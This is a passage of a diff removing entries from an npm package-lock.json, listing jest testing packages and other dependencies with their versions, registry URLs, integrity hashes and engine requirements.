"^29.6.1", - "import-local": "^3.0.2", - "jest-cli": "^29.6.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-changed-files": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/jest-changed-files/-/jest-changed-files-29.5.0.tgz", - "integrity": "sha512-IFG34IUMUaNBIxjQXF/iu7g6EcdMrGRRxaUSw92I/2g2YC6vCdTltl4nHvt7Ci5nSJwXIkCu8Ka1DKF+X7Z1Ag==", - "dev": true, - "dependencies": { - "execa": "^5.0.0", - "p-limit": "^3.1.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-circus": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-circus/-/jest-circus-29.6.1.tgz", - "integrity": "sha512-tPbYLEiBU4MYAL2XoZme/bgfUeotpDBd81lgHLCbDZZFaGmECk0b+/xejPFtmiBP87GgP/y4jplcRpbH+fgCzQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "co": "^4.6.0", - "dedent": "^0.7.0", - "is-generator-fn": "^2.0.0", - "jest-each": "^29.6.1", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "p-limit": "^3.1.0", - "pretty-format": "^29.6.1", - "pure-rand": "^6.0.0", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-cli": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-cli/-/jest-cli-29.6.1.tgz", - "integrity": "sha512-607dSgTA4ODIN6go9w6xY3EYkyPFGicx51a69H7yfvt7lN53xNswEVLovq+E77VsTRi5fWprLH0yl4DJgE8Ing==", - "dev": true, - "dependencies": { - "@jest/core": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "import-local": "^3.0.2", - "jest-config": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "prompts": "^2.0.1", - "yargs": "^17.3.1" - }, - "bin": { - "jest": "bin/jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/jest-config": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-config/-/jest-config-29.6.1.tgz", - "integrity": "sha512-XdjYV2fy2xYixUiV2Wc54t3Z4oxYPAELUzWnV6+mcbq0rh742X2p52pii5A3oeRzYjLnQxCsZmp0qpI6klE2cQ==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/test-sequencer": "^29.6.1", - "@jest/types": "^29.6.1", - "babel-jest": "^29.6.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "deepmerge": "^4.2.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-circus": "^29.6.1", - "jest-environment-node": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "micromatch": "^4.0.4", - "parse-json": "^5.2.0", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@types/node": "*", - "ts-node": ">=9.0.0" - }, - "peerDependenciesMeta": { - "@types/node": { - "optional": true - }, - "ts-node": { - "optional": true - } - } - }, - "node_modules/jest-diff": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-diff/-/jest-diff-29.6.1.tgz", - "integrity": "sha512-FsNCvinvl8oVxpNLttNQX7FAq7vR+gMDGj90tiP7siWw1UdakWUGqrylpsYrpvj908IYckm5Y0Q7azNAozU1Kg==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "diff-sequences": "^29.4.3", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-docblock": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-docblock/-/jest-docblock-29.4.3.tgz", - "integrity": "sha512-fzdTftThczeSD9nZ3fzA/4KkHtnmllawWrXO69vtI+L9WjEIuXWs4AmyME7lN5hU7dB0sHhuPfcKofRsUb/2Fg==", - "dev": true, - "dependencies": { - "detect-newline": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-each": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-each/-/jest-each-29.6.1.tgz", - "integrity": "sha512-n5eoj5eiTHpKQCAVcNTT7DRqeUmJ01hsAL0Q1SMiBHcBcvTKDELixQOGMCpqhbIuTcfC4kMfSnpmDqRgRJcLNQ==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "jest-util": "^29.6.1", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-environment-node": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-environment-node/-/jest-environment-node-29.6.1.tgz", - "integrity": "sha512-ZNIfAiE+foBog24W+2caIldl4Irh8Lx1PUhg/GZ0odM1d/h2qORAsejiFc7zb+SEmYPn1yDZzEDSU5PmDkmVLQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-get-type": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.4.3.tgz", - "integrity": "sha512-J5Xez4nRRMjk8emnTpWrlkyb9pfRQQanDrvWHhsR1+VUfbwxi30eVcZFlcdGInRibU4G5LwHXpI7IRHU0CY+gg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-haste-map": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.6.1.tgz", - "integrity": "sha512-0m7f9PZXxOCk1gRACiVgX85knUKPKLPg4oRCjLoqIm9brTHXaorMA0JpmtmVkQiT8nmXyIVoZd/nnH1cfC33ig==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "optionalDependencies": { - "fsevents": "^2.3.2" - } - }, - "node_modules/jest-leak-detector": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.6.1.tgz", - "integrity": "sha512-OrxMNyZirpOEwkF3UHnIkAiZbtkBWiye+hhBweCHkVbCgyEy71Mwbb5zgeTNYWJBi1qgDVfPC1IwO9dVEeTLwQ==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-matcher-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.6.1.tgz", - "integrity": "sha512-SLaztw9d2mfQQKHmJXKM0HCbl2PPVld/t9Xa6P9sgiExijviSp7TnZZpw2Fpt+OI3nwUO/slJbOfzfUMKKC5QA==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-message-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.6.1.tgz", - "integrity": "sha512-KoAW2zAmNSd3Gk88uJ56qXUWbFk787QKmjjJVOjtGFmmGSZgDBrlIL4AfQw1xyMYPNVD7dNInfIbur9B2rd/wQ==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.6.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-mock": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.6.1.tgz", - "integrity": "sha512-brovyV9HBkjXAEdRooaTQK42n8usKoSRR3gihzUpYeV/vwqgSoNfrksO7UfSACnPmxasO/8TmHM3w9Hp3G1dgw==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "engines": { - "node": ">=6" - }, - "peerDependencies": { - "jest-resolve": "*" - }, - "peerDependenciesMeta": { - "jest-resolve": { - "optional": true - } - } - }, - "node_modules/jest-regex-util": { - "version": "29.4.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.4.3.tgz", - "integrity": "sha512-O4FglZaMmWXbGHSQInfXewIsd1LMn9p3ZXB/6r4FOkyhX2/iP/soMG98jGvk/A3HAN78+5VWcBGO0BJAPRh4kg==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.6.1.tgz", - "integrity": "sha512-AeRkyS8g37UyJiP9w3mmI/VXU/q8l/IH52vj/cDAyScDcemRbSBhfX/NMYIGilQgSVwsjxrCHf3XJu4f+lxCMg==", - "dev": true, - "dependencies": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-resolve-dependencies": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.6.1.tgz", - "integrity": "sha512-BbFvxLXtcldaFOhNMXmHRWx1nXQO5LoXiKSGQcA1LxxirYceZT6ch8KTE1bK3X31TNG/JbkI7OkS/ABexVahiw==", - "dev": true, - "dependencies": { - "jest-regex-util": "^29.4.3", - "jest-snapshot": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runner": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.6.1.tgz", - "integrity": "sha512-tw0wb2Q9yhjAQ2w8rHRDxteryyIck7gIzQE4Reu3JuOBpGp96xWgF0nY8MDdejzrLCZKDcp8JlZrBN/EtkQvPQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/environment": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.4.3", - "jest-environment-node": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-leak-detector": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-resolve": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-util": "^29.6.1", - "jest-watcher": "^29.6.1", - "jest-worker": "^29.6.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-runtime": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.6.1.tgz", - "integrity": "sha512-D6/AYOA+Lhs5e5il8+5pSLemjtJezUr+8zx+Sn8xlmOux3XOqx4d8l/2udBea8CRPqqrzhsKUsN/gBDE/IcaPQ==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/fake-timers": "^29.6.1", - "@jest/globals": "^29.6.1", - "@jest/source-map": "^29.6.0", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.6.1.tgz", - "integrity": "sha512-G4UQE1QQ6OaCgfY+A0uR1W2AY0tGXUPQpoUClhWHq1Xdnx1H6JOrC2nH5lqnOEqaDgbHFgIwZ7bNq24HpB180A==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.6.1", - "jest-get-type": "^29.4.3", - "jest-matcher-utils": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.6.1", - "semver": "^7.5.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-snapshot/node_modules/lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "dependencies": { - "yallist": "^4.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "dependencies": { - "lru-cache": "^6.0.0" - }, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/jest-snapshot/node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - }, - "node_modules/jest-util": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.6.1.tgz", - "integrity": "sha512-NRFCcjc+/uO3ijUVyNOQJluf8PtGCe/W6cix36+M3cTFgiYqFOOW5MgN4JOOcvbUhcKTYVd1CvHz/LWi8d16Mg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.6.1.tgz", - "integrity": "sha512-r3Ds69/0KCN4vx4sYAbGL1EVpZ7MSS0vLmd3gV78O+NAx3PDQQukRU5hNHPXlyqCgFY8XUk7EuTMLugh0KzahA==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.4.3", - "leven": "^3.1.0", - "pretty-format": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-validate/node_modules/camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/jest-watcher": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.6.1.tgz", - "integrity": "sha512-d4wpjWTS7HEZPaaj8m36QiaP856JthRZkrgcIY/7ISoUWPIillrXM23WPboZVLbiwZBt4/qn2Jke84Sla6JhFA==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.6.1", - "string-length": "^4.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.6.1.tgz", - "integrity": "sha512-U+Wrbca7S8ZAxAe9L6nb6g8kPdia5hj32Puu5iOqBCMTMWFHXuK6dOV2IFrpedbTV8fjMFLdWNttQTBL6u2MRA==", - "dev": true, - "dependencies": { - "@types/node": "*", - "jest-util": "^29.6.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/jest-worker/node_modules/supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/supports-color?sponsor=1" - } - }, - "node_modules/js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "node_modules/js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "dependencies": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "node_modules/json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/lodash": { - "version": "4.17.21", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz", - "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg==" - }, - "node_modules/lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "dependencies": { - "yallist": "^3.0.2" - } - }, - "node_modules/make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "dependencies": { - "semver": "^6.0.0" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "dependencies": { - "tmpl": "1.0.5" - } - }, - "node_modules/merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "node_modules/micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "dependencies": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "dependencies": { - "brace-expansion": "^1.1.7" - }, - "engines": { - "node": "*" - } - }, - "node_modules/ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node_modules/node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node_modules/node-releases": { - "version": "2.0.13", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.13.tgz", - "integrity": "sha512-uYr7J37ae/ORWdZeQ1xxMJe3NtdmqMC/JZK+geofDrkLUApKRHPd18/TxtBOJ4A0/+uUIliorNrfYV6s1b02eQ==", - "dev": true - }, - "node_modules/normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "dependencies": { - "path-key": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": 